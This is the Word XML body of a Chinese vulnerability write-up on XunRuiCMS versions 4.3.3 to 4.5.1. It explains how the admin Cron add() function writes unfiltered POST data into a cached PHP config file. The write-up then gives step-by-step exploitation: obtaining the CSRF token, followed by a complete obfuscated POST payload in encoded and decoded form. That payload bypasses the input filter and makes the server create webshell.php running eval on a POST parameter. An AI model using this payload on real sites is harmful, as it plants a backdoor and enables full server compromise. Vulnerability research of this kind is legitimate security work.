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FD15F" w14:textId="47D479FE" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t># 触发条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD98CBE" w14:textId="24149223" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个条件</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6BC0CD" w14:textId="443704A8" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>1.迅睿CMS 版本为v4.3.3到v4.5.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D04D24" w14:textId="3C121BAB" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>2.登录后台,且为管理员或具有"应用"-&gt;"任务队列"的管理权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBC4DAF" w14:textId="5BFCEEE4" w:rsidR="002F6202" w:rsidRDefault="002F6202" w:rsidP="00F122AF"/>
    <w:p w14:paraId="11658323" w14:textId="031FBE0B" w:rsidR="002F6202" w:rsidRDefault="002F6202" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下图:只有</w:t>
      </w:r>
      <w:r>
        <w:t>"应用"-&gt;"任务队列"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限的名为test的用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072C41A9" w14:textId="4105FB6A" w:rsidR="00F122AF" w:rsidRDefault="002F6202" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24E954A1" wp14:editId="4C9FAF97">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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AD911" w14:textId="1E87CE97" w:rsidR="000E36EB" w:rsidRDefault="000E36EB" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下图:该用户可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>"应用"-&gt;"任务队列"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0D4288" w14:textId="006F9004" w:rsidR="000E36EB" w:rsidRDefault="000E36EB" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52F4A6BE" wp14:editId="764FAD9C">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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DE474" w14:textId="77777777" w:rsidR="002F6202" w:rsidRPr="00F122AF" w:rsidRDefault="002F6202" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BEBB92B" w14:textId="0DBA86DD" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t># 漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2BA58D" w14:textId="0FB7B5F6" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>Admin控制器文件夹下Cron.php控制器的add()函数对于用户的输入没有进行专门的过滤,致使攻击者在具备管理员权限或具有"应用"-&gt;"任务队列"的管理权限时可以对</w:t>
      </w:r>
      <w:r w:rsidR="00A80226">
        <w:t>WRITEPATH.’config/cron.php’</w:t>
      </w:r>
      <w:r>
        <w:t>文件写入任意内容,同时该文件有多处被包含且可以被利用的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>点,正常情况下具有上述的触发条件即可稳定触发该漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7AE0AD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="7DB150BC" w14:textId="63864D59" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t># 漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F5637E" w14:textId="16732666" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>## 在版本v4.3.3到v4.5.0下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F6B349" w14:textId="1A5587A1" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>1.该cms在具备上述权限的情况下,可以通过http://host:port/Admin.php?c=Cron&amp;m=add调用Admin控制器文件夹下Cron.php控制器的add()函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2448E18C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="1660DE33" w14:textId="7E680557" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>2.add()函数的代码:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D38F683" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>// 任务类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D55CAF8" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>public function add() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F585B98" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="0BBEA559" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    $json = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9F39E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    if (is_file(WRITEPATH.'config/cron.php')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6363B549" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        require WRITEPATH.'config/cron.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032E96E7" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5FC62E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="4E429746" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    $data = json_decode($json, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB22AA0" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="2D1A1FEE" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    if (IS_AJAX_POST) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E47C533" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="02652A45" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        $post = \Phpcmf\Service::L('input')-&gt;post('data', true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E134C64" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="4566826E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        file_put_contents(WRITEPATH.'config/cron.php',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A68850" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            '&lt;?php defined(\'FCPATH\') OR exit(\'No direct script access allowed\');'.PHP_EOL.' $json=\''.json_encode($post).'\';');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C80A13" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="503770C4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        \Phpcmf\Service::L('input')-&gt;system_log('设置自定义任务类型');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EDDE66" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="3579EF08" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        $this-&gt;_json(1, dr_lang('操作成功'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D3E90A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599FE405" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="65FB8747" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    \Phpcmf\Service::V()-&gt;assign([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D81AB78" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        'data' =&gt; $data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729C2462" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2CC54D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    \Phpcmf\Service::V()-&gt;display('cron_add.html');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BE8560" w14:textId="77A1DE1A" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220F8C71" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="50F5A4BA" w14:textId="77FF2FD3" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>### add()函数的分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABD54D3" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>if (is_file(WRITEPATH.'config/cron.php')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6C1A03" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    require WRITEPATH.'config/cron.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206AAA99" w14:textId="490B231D" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371F73D8" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="4CABEB27" w14:textId="71A27A46" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>add()函数首先会在WRITEPATH.'config/cron.php'文件存在时包含该文件,WRITEPATH可在网站根目录的index.php里配置,默认情况下为网站根目录下的cache/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20192009" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="5FEBA999" w14:textId="0139C3CC" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>$json = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED638EE" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>$data = json_decode($json, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4C3D7D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="26DFAB72" w14:textId="0256359C" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:t>add()函数通过json_decode($json, true)函数给$data赋值Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2637CF1F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="781B501A" w14:textId="7EEEB236" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>if (IS_AJAX_POST){}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FF50AC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="72C695DF" w14:textId="0CA989A5" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后进入一个</w:t>
      </w:r>
      <w:r>
        <w:t>if分支语句,当IS_AJAX_POST时,则执行相关的写入文件的代码,否则则跳过写入文件,显示Cron的添加页面,随即结束add()函数,IS_AJAX_POST定义为当收到post请求且post的内容不为空时即返回TRUE,否则返回FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47707F7A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="7A00CD83" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>$post = \Phpcmf\Service::L('input')-&gt;post('data', true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227E3427" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="5EA37111" w14:textId="0A3EED31" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>if语句中,首先\Phpcmf\Service::L('input')-&gt;post('data', true)该代码通过调用Input.php文件里定义的Input类的post()函数,在接收到post请求且存在key为data时进行xss清洗然后返回,否则直接返回false,然后赋值给$post,xss清洗的代码比较长,我放在本文章的最后,此处的xss清洗可以轻易的绕过,从而达到写入我们想要的任意内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9392C7" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="5E4045AD" w14:textId="2B1E1EE2" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>file_put_contents(WRITEPATH.'config/cron.php',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BDD36B" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            '&lt;?php defined(\'FCPATH\') OR exit(\'No direct script access allowed\');'.PHP_EOL.' $json=\''.json_encode($post).'\';');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5734BA97" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="1CE712EA" w14:textId="16B82D83" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>if语句中,接收完post请求,即将接收到的内容通过json编码后写入WRITEPATH.'config/cron.php'文件,可控的写入点位于字符串$json的赋值中,且在两个'的包裹中,此处是漏洞产生的主要原因,未对用户的输入做足够的判断或清洗即写入相应的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CD6F9A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="490F8BE8" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>\Phpcmf\Service::L('input')-&gt;system_log('设置自定义任务类型');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74771DA4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>$this-&gt;_json(1, dr_lang('操作成功'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E83287" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="36E7167F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>if语句的最后,写入日志并显示操作结果,随即显示cron添加界面,add()函数结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A56DB7B" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="512ED340" w14:textId="0B1C8D96" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>### 绕过json编码和xss清洗以及WRITEPATH.'config/cron.php'文件中'的包裹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6B28BA" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="06061F52" w14:textId="71D67CD2" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过前文的分析</w:t>
      </w:r>
      <w:r>
        <w:t>,我们可以发现,add()函数对用户的输入基本没有特殊的防范,只要绕过xss清洗和json编码以及WRITEPATH.'config/cron.php'文件中'的包裹即可写入我们想要的任意内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EC45A9" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="0A393911" w14:textId="458E4F56" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是我的一种方法</w:t>
      </w:r>
      <w:r>
        <w:t>,在WRITEPATH.'config/cron.php'文件中写入了当运行WRITEPATH.'config/cron.php'文件时在网站根目录写一个名为webshell.php,内容为&lt;?php eval(@$_POST["password"]);?&gt;的php语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504EFE64" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="01822B88" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意下述操作需要先获取</w:t>
      </w:r>
      <w:r>
        <w:t>csrf_test_name,获取方法:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CCB4C7" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="3D403539" w14:textId="6286D2CF" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.访问http://host:port/Admin.php?c=Cron&amp;m=add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6346A58B" w14:textId="0C377BE0" w:rsidR="00F122AF" w:rsidRDefault="000E36EB" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图片:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4797FD4B" w14:textId="586CE3EA" w:rsidR="000E36EB" w:rsidRDefault="000E36EB" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64705C3A" wp14:editId="65F3672E">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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C754" w14:textId="77777777" w:rsidR="000E36EB" w:rsidRDefault="000E36EB" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2849BD88" w14:textId="75C6E844" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>2.抓包当点击"保存"时发送的post包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC96127" w14:textId="4C7791B1" w:rsidR="006940AB" w:rsidRDefault="006940AB" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图片:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF8E3CC" w14:textId="2490EAED" w:rsidR="00F122AF" w:rsidRDefault="006940AB" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6691402A" wp14:editId="563B5D0D">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="4" name="Picture 4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9AD9" w14:textId="77777777" w:rsidR="000E36EB" w:rsidRDefault="000E36EB" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A47D755" w14:textId="221D0D11" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>3.post的内容里的csrf_test_name即可一直用作一段时间内的csrf_test_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8B0FE1" w14:textId="19FB5E2A" w:rsidR="006940AB" w:rsidRDefault="006940AB" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图片:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E967566" w14:textId="55BADEA4" w:rsidR="006940AB" w:rsidRDefault="006940AB" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CFC149D" wp14:editId="076D5F9D">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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C9FF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="4CAE9ED9" w14:textId="20EBB0A6" w:rsidR="006940AB" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取到</w:t>
      </w:r>
      <w:r>
        <w:t>csrf_test_name之后,给</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00A80226" w:rsidRPr="00A619D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://host:port/Admin.php?c=Cron&amp;m=add</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A80226">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>post以下内容:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391F031B" w14:textId="77777777" w:rsidR="006940AB" w:rsidRDefault="006940AB" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C185FC7" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>isform=1&amp;csrf_test_name=3318a4fabdf4ea654734315a4d508a5f&amp;data%5B1%5D%5Bname%5D=&amp;data%5B1%5D%5Bcode%5D=%5B';file_put_contents('webshell.php',htmlspecialchars_decode('&lt;').'?php%20eval'.base64_decode('KA==').'@$_POST%5B'.base64_decode('Ig==').'password'.base64_decode('Ig==').'%5D'.base64_decode('KQ==').';?'.htmlspecialchars_decode('&gt;'));return;'%5D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1F51AC" w14:textId="0CE48907" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="36699847" w14:textId="217AFD2E" w:rsidR="006940AB" w:rsidRDefault="006940AB" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图片</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064FA4B5" w14:textId="0076672E" w:rsidR="006940AB" w:rsidRDefault="005231E3" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5960F46D" wp14:editId="6D22A655">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="16" name="Picture 16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FCB4" w14:textId="77777777" w:rsidR="006940AB" w:rsidRDefault="006940AB" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="128D2168" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过</w:t>
      </w:r>
      <w:r>
        <w:t>url解码后为:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B47583D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="0B11049D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>isform=1&amp;csrf_test_name=3318a4fabdf4ea654734315a4d508a5f&amp;data[1][name]=&amp;data[1][code]=[';file_put_contents('webshell.php',htmlspecialchars_decode('&amp;lt;').'?php eval'.base64_decode('KA==').'@$_POST['.base64_decode('Ig==').'password'.base64_decode('Ig==').']'.base64_decode('KQ==').';?'.htmlspecialchars_decode('&amp;gt;'));return;']</w:t>
      </w:r>
    </w:p>
